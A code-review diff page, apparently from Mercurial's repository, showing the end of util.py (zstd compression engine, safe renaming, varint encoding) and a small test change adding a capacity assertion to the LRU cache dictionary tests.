3670 3670 data = z.compress(chunk)
3671 3671 if data:
3672 3672 yield data
3673 3673
3674 3674 yield z.flush()
3675 3675
3676 3676 def decompressorreader(self, fh):
3677 3677 return _ZstdCompressedStreamReader(fh, self._module)
3678 3678
3679 3679 class zstdrevlogcompressor(object):
3680 3680 def __init__(self, zstd, level=3):
3681 3681 # TODO consider omitting frame magic to save 4 bytes.
3682 3682 # This writes content sizes into the frame header. That is
3683 3683 # extra storage. But it allows a correct size memory allocation
3684 3684 # to hold the result.
3685 3685 self._cctx = zstd.ZstdCompressor(level=level)
3686 3686 self._dctx = zstd.ZstdDecompressor()
3687 3687 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3688 3688 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3689 3689
3690 3690 def compress(self, data):
3691 3691 insize = len(data)
3692 3692 # Caller handles empty input case.
3693 3693 assert insize > 0
3694 3694
3695 3695 if insize < 50:
3696 3696 return None
3697 3697
3698 3698 elif insize <= 1000000:
3699 3699 compressed = self._cctx.compress(data)
3700 3700 if len(compressed) < insize:
3701 3701 return compressed
3702 3702 return None
3703 3703 else:
3704 3704 z = self._cctx.compressobj()
3705 3705 chunks = []
3706 3706 pos = 0
3707 3707 while pos < insize:
3708 3708 pos2 = pos + self._compinsize
3709 3709 chunk = z.compress(data[pos:pos2])
3710 3710 if chunk:
3711 3711 chunks.append(chunk)
3712 3712 pos = pos2
3713 3713 chunks.append(z.flush())
3714 3714
3715 3715 if sum(map(len, chunks)) < insize:
3716 3716 return ''.join(chunks)
3717 3717 return None
3718 3718
3719 3719 def decompress(self, data):
3720 3720 insize = len(data)
3721 3721
3722 3722 try:
3723 3723 # This was measured to be faster than other streaming
3724 3724 # decompressors.
3725 3725 dobj = self._dctx.decompressobj()
3726 3726 chunks = []
3727 3727 pos = 0
3728 3728 while pos < insize:
3729 3729 pos2 = pos + self._decompinsize
3730 3730 chunk = dobj.decompress(data[pos:pos2])
3731 3731 if chunk:
3732 3732 chunks.append(chunk)
3733 3733 pos = pos2
3734 3734 # Frame should be exhausted, so no finish() API.
3735 3735
3736 3736 return ''.join(chunks)
3737 3737 except Exception as e:
3738 3738 raise error.RevlogError(_('revlog decompress error: %s') %
3739 3739 stringutil.forcebytestr(e))
3740 3740
3741 3741 def revlogcompressor(self, opts=None):
3742 3742 opts = opts or {}
3743 3743 return self.zstdrevlogcompressor(self._module,
3744 3744 level=opts.get('level', 3))
3745 3745
3746 3746 compengines.register(_zstdengine())
3747 3747
3748 3748 def bundlecompressiontopics():
3749 3749 """Obtains a list of available bundle compressions for use in help."""
3750 3750 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3751 3751 items = {}
3752 3752
3753 3753 # We need to format the docstring. So use a dummy object/type to hold it
3754 3754 # rather than mutating the original.
3755 3755 class docobject(object):
3756 3756 pass
3757 3757
3758 3758 for name in compengines:
3759 3759 engine = compengines[name]
3760 3760
3761 3761 if not engine.available():
3762 3762 continue
3763 3763
3764 3764 bt = engine.bundletype()
3765 3765 if not bt or not bt[0]:
3766 3766 continue
3767 3767
3768 3768 doc = pycompat.sysstr('``%s``\n %s') % (
3769 3769 bt[0], engine.bundletype.__doc__)
3770 3770
3771 3771 value = docobject()
3772 3772 value.__doc__ = doc
3773 3773 value._origdoc = engine.bundletype.__doc__
3774 3774 value._origfunc = engine.bundletype
3775 3775
3776 3776 items[bt[0]] = value
3777 3777
3778 3778 return items
3779 3779
3780 3780 i18nfunctions = bundlecompressiontopics().values()
3781 3781
3782 3782 # convenient shortcut
3783 3783 dst = debugstacktrace
3784 3784
3785 3785 def safename(f, tag, ctx, others=None):
3786 3786 """
3787 3787 Generate a name that it is safe to rename f to in the given context.
3788 3788
3789 3789 f: filename to rename
3790 3790 tag: a string tag that will be included in the new name
3791 3791 ctx: a context, in which the new name must not exist
3792 3792 others: a set of other filenames that the new name must not be in
3793 3793
3794 3794 Returns a file name of the form oldname~tag[~number] which does not exist
3795 3795 in the provided context and is not in the set of other names.
3796 3796 """
3797 3797 if others is None:
3798 3798 others = set()
3799 3799
3800 3800 fn = '%s~%s' % (f, tag)
3801 3801 if fn not in ctx and fn not in others:
3802 3802 return fn
3803 3803 for n in itertools.count(1):
3804 3804 fn = '%s~%s~%s' % (f, tag, n)
3805 3805 if fn not in ctx and fn not in others:
3806 3806 return fn
3807 3807
3808 3808 def readexactly(stream, n):
3809 3809 '''read n bytes from stream.read and abort if less was available'''
3810 3810 s = stream.read(n)
3811 3811 if len(s) < n:
3812 3812 raise error.Abort(_("stream ended unexpectedly"
3813 3813 " (got %d bytes, expected %d)")
3814 3814 % (len(s), n))
3815 3815 return s
3816 3816
3817 3817 def uvarintencode(value):
3818 3818 """Encode an unsigned integer value to a varint.
3819 3819
3820 3820 A varint is a variable length integer of 1 or more bytes. Each byte
3821 3821 except the last has the most significant bit set. The lower 7 bits of
3822 3822 each byte store the 2's complement representation, least significant group
3823 3823 first.
3824 3824
3825 3825 >>> uvarintencode(0)
3826 3826 '\\x00'
3827 3827 >>> uvarintencode(1)
3828 3828 '\\x01'
3829 3829 >>> uvarintencode(127)
3830 3830 '\\x7f'
3831 3831 >>> uvarintencode(1337)
3832 3832 '\\xb9\\n'
3833 3833 >>> uvarintencode(65536)
3834 3834 '\\x80\\x80\\x04'
3835 3835 >>> uvarintencode(-1)
3836 3836 Traceback (most recent call last):
3837 3837 ...
3838 3838 ProgrammingError: negative value for uvarint: -1
3839 3839 """
3840 3840 if value < 0:
3841 3841 raise error.ProgrammingError('negative value for uvarint: %d'
3842 3842 % value)
3843 3843 bits = value & 0x7f
3844 3844 value >>= 7
3845 3845 bytes = []
3846 3846 while value:
3847 3847 bytes.append(pycompat.bytechr(0x80 | bits))
3848 3848 bits = value & 0x7f
3849 3849 value >>= 7
3850 3850 bytes.append(pycompat.bytechr(bits))
3851 3851
3852 3852 return ''.join(bytes)
3853 3853
3854 3854 def uvarintdecodestream(fh):
3855 3855 """Decode an unsigned variable length integer from a stream.
3856 3856
3857 3857 The passed argument is anything that has a ``.read(N)`` method.
3858 3858
3859 3859 >>> try:
3860 3860 ... from StringIO import StringIO as BytesIO
3861 3861 ... except ImportError:
3862 3862 ... from io import BytesIO
3863 3863 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3864 3864 0
3865 3865 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3866 3866 1
3867 3867 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3868 3868 127
3869 3869 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3870 3870 1337
3871 3871 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3872 3872 65536
3873 3873 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3874 3874 Traceback (most recent call last):
3875 3875 ...
3876 3876 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3877 3877 """
3878 3878 result = 0
3879 3879 shift = 0
3880 3880 while True:
3881 3881 byte = ord(readexactly(fh, 1))
3882 3882 result |= ((byte & 0x7f) << shift)
3883 3883 if not (byte & 0x80):
3884 3884 return result
3885 3885 shift += 7
@@ -1,121 +1,122 b''
1 1 from __future__ import absolute_import, print_function
2 2
3 3 import unittest
4 4
5 5 import silenttestrunner
6 6
7 7 from mercurial import (
8 8 util,
9 9 )
10 10
11 11 class testlrucachedict(unittest.TestCase):
12 12 def testsimple(self):
13 13 d = util.lrucachedict(4)
14 self.assertEqual(d.capacity, 4)
14 15 d['a'] = 'va'
15 16 d['b'] = 'vb'
16 17 d['c'] = 'vc'
17 18 d['d'] = 'vd'
18 19
19 20 self.assertEqual(d['a'], 'va')
20 21 self.assertEqual(d['b'], 'vb')
21 22 self.assertEqual(d['c'], 'vc')
22 23 self.assertEqual(d['d'], 'vd')
23 24
24 25 # 'a' should be dropped because it was least recently used.
25 26 d['e'] = 've'
26 27 self.assertNotIn('a', d)
27 28
28 29 self.assertIsNone(d.get('a'))
29 30
30 31 self.assertEqual(d['b'], 'vb')
31 32 self.assertEqual(d['c'], 'vc')
32 33 self.assertEqual(d['d'], 'vd')
33 34 self.assertEqual(d['e'], 've')
34 35
35 36 # Touch entries in some order (both get and set).
36 37 d['e']
37 38 d['c'] = 'vc2'
38 39 d['d']
39 40 d['b'] = 'vb2'
40 41
41 42 # 'e' should be dropped now
42 43 d['f'] = 'vf'
43 44 self.assertNotIn('e', d)
44 45 self.assertEqual(d['b'], 'vb2')
45 46 self.assertEqual(d['c'], 'vc2')
46 47 self.assertEqual(d['d'], 'vd')
47 48 self.assertEqual(d['f'], 'vf')
48 49
49 50 d.clear()
50 51 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
51 52 self.assertNotIn(key, d)
52 53
53 54 def testunfull(self):
54 55 d = util.lrucachedict(4)
55 56 d['a'] = 1
56 57 d['b'] = 2
57 58 d['a']
58 59 d['b']
59 60
60 61 for key in ('a', 'b'):
61 62 self.assertIn(key, d)
62 63
63 64 def testcopypartial(self):
64 65 d = util.lrucachedict(4)
65 66 d['a'] = 'va'
66 67 d['b'] = 'vb'
67 68
68 69 dc = d.copy()
69 70
70 71 self.assertEqual(len(dc), 2)
71 72 for key in ('a', 'b'):
72 73 self.assertIn(key, dc)
73 74 self.assertEqual(dc[key], 'v%s' % key)
74 75
75 76 self.assertEqual(len(d), 2)
76 77 for key in ('a', 'b'):
77 78 self.assertIn(key, d)
78 79 self.assertEqual(d[key], 'v%s' % key)
79 80
80 81 d['c'] = 'vc'
81 82 del d['b']
82 83 dc = d.copy()
83 84 self.assertEqual(len(dc), 2)
84 85 for key in ('a', 'c'):
85 86 self.assertIn(key, dc)
86 87 self.assertEqual(dc[key], 'v%s' % key)
87 88
88 89 def testcopyempty(self):
89 90 d = util.lrucachedict(4)
90 91 dc = d.copy()
91 92 self.assertEqual(len(dc), 0)
92 93
93 94 def testcopyfull(self):
94 95 d = util.lrucachedict(4)
95 96 d['a'] = 'va'
96 97 d['b'] = 'vb'
97 98 d['c'] = 'vc'
98 99 d['d'] = 'vd'
99 100
100 101 dc = d.copy()
101 102
102 103 for key in ('a', 'b', 'c', 'd'):
103 104 self.assertIn(key, dc)
104 105 self.assertEqual(dc[key], 'v%s' % key)
105 106
106 107 # 'a' should be dropped because it was least recently used.
107 108 dc['e'] = 've'
108 109 self.assertNotIn('a', dc)
109 110 for key in ('b', 'c', 'd', 'e'):
110 111 self.assertIn(key, dc)
111 112 self.assertEqual(dc[key], 'v%s' % key)
112 113
113 114 # Contents and order of original dict should remain unchanged.
114 115 dc['b'] = 'vb_new'
115 116
116 117 self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
117 118 for key in ('a', 'b', 'c', 'd'):
118 119 self.assertEqual(d[key], 'v%s' % key)
119 120
120 121 if __name__ == '__main__':
121 122 silenttestrunner.main(__name__)
General Comments 0
You need to be logged in to leave comments. Login now